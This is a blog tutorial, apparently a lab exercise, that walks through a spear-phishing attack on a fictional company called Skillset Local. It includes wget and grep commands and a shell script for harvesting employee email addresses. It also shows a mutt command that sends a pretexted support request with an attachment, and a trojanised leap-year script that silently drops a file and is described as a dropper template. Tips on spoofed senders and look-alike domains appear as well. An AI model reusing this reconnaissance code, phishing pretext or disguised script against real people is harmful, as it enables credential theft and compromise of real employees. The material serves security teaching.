• Lucifer

Spearphishing

Spear phishing is a targeted form of social engineering that is far more effective than generic phishing, because the message is tailored to a specific person. That customization is made possible by reconnaissance: the phishers collect information about their target from corporate websites and social networks before writing a single line of the email. Let's go through it step by step.


Step 1: Browsing to Target Company Website


In this post, we will use a very simple example to go through the steps of a typical spear-phishing attack. Let's say that we want to target one of the employees of a fictional company Skillset Local. First, let's take a look at the company website:


lynx http://skillsetlocal.com


Step 2: Looking at Company Profile


Just as real attackers do, we should invest some time into gathering information about the target company. Use your arrow keys to navigate to the "Our Mission" link and hit Enter.


We can see that Skillset Local creates custom scripts. This will come in handy later as the pretext for our message.


Step 3: Selecting Spear Phishing Target


Now go to the "Our Team" page, which is basically the company directory.


This displays the Skillset Local employees' names, job descriptions, and contact information. One of the possible attack scenarios would be to send a customer support request to Bob.


Step 4: Extracting Email Addresses


Our "target website" is very small, and all information, including email addresses, is conveniently displayed on one page. Real business websites can be quite large, without a single location for email addresses. There are numerous tools designed for scraping email addresses from public websites. Most of them utilize search engines to collect email addresses based on the target domain name.


Alternatively, you can use wget to download the contents of the website, and then grep for email addresses. Let's try that. First, create a new directory and change to it:

mkdir targetsite

cd targetsite


Next, run the following command:


wget -q -r http://skillsetlocal.com && grep -E -o -h -r "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" . | sort -u

Let's walk through the options. For wget, -q sets 'quiet' mode, so no output is displayed, and -r stands for 'recursive'. For grep, we are using -E (for 'extended' regular expressions), printing only the part of each line that matches the pattern (-o), omitting the file names (-h), and searching recursively (-r) through the current directory, which is the one we just created. Piping through sort -u removes duplicates, since the same address usually appears on several pages. Two caveats: the \b word-boundary anchor is a GNU grep extension rather than POSIX, and the {2,6} bound on the top-level domain will miss longer TLDs such as .technology, so use {2,} if the target has one.

Change back to the home directory before moving on to the next step:


cd ~
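As an added example (this is not code from the original post), here is a small shell script that does the same harvesting over a directory already mirrored with wget, with the touches a practitioner usually wants: lower-casing and de-duplication, dropping the retina-image false positives that the pattern also matches (logo@2x.png looks like an address to it), accepting TLDs of any length, and optionally keeping only addresses at the target domain. The two fixture pages it builds under a temporary directory are constructed for the demo, and the script assumes GNU grep for the -r, -h and -o options.

```shell
#!/bin/sh
# harvest.sh -- added example, not the original post's one-liner.
# Harvest e-mail addresses from a site mirrored with "wget -r".
# Assumes GNU grep (-E -o -h -r); sort/tr/awk usage is POSIX.

# No \b anchors (GNU-only) and no upper bound on the TLD length.
EMAIL_RE='[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'

# extract_emails DIR [DOMAIN]
# Prints unique, lower-cased addresses found under DIR. With DOMAIN given,
# only addresses at that domain or one of its subdomains are kept.
extract_emails() {
    dir=$1
    domain=$2
    grep -E -o -h -r "$EMAIL_RE" "$dir" 2>/dev/null \
        | tr 'A-Z' 'a-z' \
        | grep -E -v '\.(png|jpe?g|gif|svg|webp|css|js)$' \
        | awk -v d="$domain" '
            d == "" { print; next }
            {
                split($0, p, "@"); h = p[2]
                if (h == d || substr(h, length(h) - length(d)) == "." d) print
            }' \
        | sort -u
}

# make_fixture: writes two constructed "mirrored" pages (sample data for this
# demo, not real site content) and prints the directory they live in.
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/skillsetlocal.com"
    cat > "$d/skillsetlocal.com/team.html" <<'EOF'
<ul>
<li>Bob - Customer Support - <a href="mailto:Bob@SkillsetLocal.com">Bob@SkillsetLocal.com</a></li>
<li>Alice - Sales - alice.smith@mail.skillsetlocal.com</li>
<li>Webmaster: admin@skillsetlocal.com.</li>
</ul>
<img src="logo@2x.png" alt="logo">
EOF
    cat > "$d/skillsetlocal.com/partners.html" <<'EOF'
<p>Hosting by partner@example.net; support: bob@skillsetlocal.com</p>
EOF
    printf '%s\n' "$d"
}

# Usage: sh harvest.sh DIR [DOMAIN]   (nothing runs when sourced without args)
if [ "$#" -gt 0 ]; then extract_emails "$@"; fi
```

After the wget step you would run it as sh harvest.sh targetsite skillsetlocal.com. Leaving the domain off shows every address, including third parties such as the hosting provider, which often make a better pretext than an internal colleague.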


Step 5: Sending Spear Phishing Email


Let's say that we managed to hijack the admin@skillsetlocal.com email account. This makes things easier for us: Bob will most likely open an email if it comes from someone he trusts (a real attacker who cannot get the account might fall back on a look-alike domain or a spoofed From header if the target's mail server does not check it). All we need to do now is craft a convincing message and attach a file that does something malicious once Bob downloads and runs it. We will use mutt, a small but powerful text-based email client. The following command sends a message to Bob and attaches the leap_year.sh file to it:


echo "Bob, please see the attached file. Customer claims that script doesn't work." | mutt -a "leap_year.sh" -s "Customer Support request" -- skillsetuser1@skillsetlocal.com


Step 6: Switching Users


Now let's play the unsuspecting victim. Switch to Bob's account with the following command, entering p@ssw0rd (the lab account's password) when prompted.

su - skillsetuser1


Step 7: Checking Email


Now let's check email. Enter mutt to open the email client.

mutt


If prompted, press the y key to confirm creating the mailbox.


Step 8: Saving Attachment


You should see our spear-phishing email in the inbox. Hit Enter to open it.


Next, hit v to view the attachment.


You will see a list of two files, the one on the bottom being our script. Select it by entering 2 and hitting Enter to confirm "Jump to: 2".


Next, hit s to save the file. At the bottom you should see the "Save to file:" prompt. Change the path so the attachment is saved to the /tmp folder: /tmp/leap_year.sh


Step 9: Checking /tmp Folder


This script determines whether the year provided by the user is a leap year, but we modified it slightly so that it also creates a file on the local system when executed. First, list the contents of the /tmp folder:

ls /tmp


You should see our downloaded attachment there.
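The post does not show the attachment itself, so here is an added example of what such a script plausibly looks like (this is not the original post's leap_year.sh). The leap-year logic is the ordinary Gregorian rule; everything below it is the "slight modification": a marker file quietly written to the directory named in MARKER_DIR (default /tmp) under an assumed file name, with failures swallowed so nothing looks odd to the person who ran it. The marker name and the message it contains are assumptions for the demo.

```shell
#!/bin/sh
# leap_year.sh -- added example, a reconstruction of the attachment described
# in the post, not the original file. Looks like a harmless utility; the
# plant_marker call at the end is the hidden side effect.

MARKER_DIR=${MARKER_DIR:-/tmp}
MARKER_NAME=${MARKER_NAME:-.sk_support_cache}   # assumed name for the demo

# is_leap_year YEAR -> exit 0 if leap, 1 otherwise.
# Gregorian rule: divisible by 4, except centuries, except every 400 years.
is_leap_year() {
    y=$1
    if [ $((y % 400)) -eq 0 ]; then return 0; fi
    if [ $((y % 100)) -eq 0 ]; then return 1; fi
    if [ $((y % 4)) -eq 0 ]; then return 0; fi
    return 1
}

# leap_year_label YEAR -> prints "leap" or "common"
leap_year_label() {
    if is_leap_year "$1"; then echo leap; else echo common; fi
}

# plant_marker: the payload. It only writes where the victim can already write,
# so no privilege is needed; a real dropper would put something useful here.
plant_marker() {
    printf 'planted by %s on %s\n' "$(id -un)" "$(date)" > "$MARKER_DIR/$MARKER_NAME"
}

# main YEAR: validate the argument, print the answer, then plant the marker.
main() {
    case $1 in
        ''|*[!0-9]*) echo "usage: $0 YEAR" >&2; return 2 ;;
    esac
    echo "$1 is a $(leap_year_label "$1") year"
    plant_marker 2>/dev/null || true    # fail silently so the user notices nothing
    return 0
}

# Only run when invoked with an argument (./leap_year.sh 2020).
if [ "$#" -gt 0 ]; then main "$@"; fi
```

Read as Bob would, the script does exactly what the support request claims, which is why a quick look at the output proves nothing; the side effect only shows up when you compare the directory listing before and after, as the next steps do.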


Step 10: Making File Executable


Now issue the following command to make the script executable:

chmod +x /tmp/leap_year.sh


Step 11: Running Downloaded Script


Run the script, passing any year as the argument (2020 here). Note the absolute path: we are in Bob's home directory, and the attachment was saved under /tmp.

/tmp/leap_year.sh 2020


Step 12: Checking /tmp Folder


Now run the ls command on the /tmp folder again. You will see a file that wasn't there earlier.

ls /tmp


This file doesn't do anything other than illustrate how easy it is to plant something on a system once a user is tricked into saving and opening an email attachment. Note that the victim still had to mark the script executable and run it by hand; a real payload would usually be packaged so that fewer steps stand between opening the attachment and execution. In the Client-Side Attack post, you will see exactly what kind of damage can be done with this type of compromise.




That's it for this post. I hope you learned something new; please share it with your friends. More amazing stuff is waiting for you: check out the shop at Payground or visit HERE.


©2020 by Payground. Proudly created with Wix.com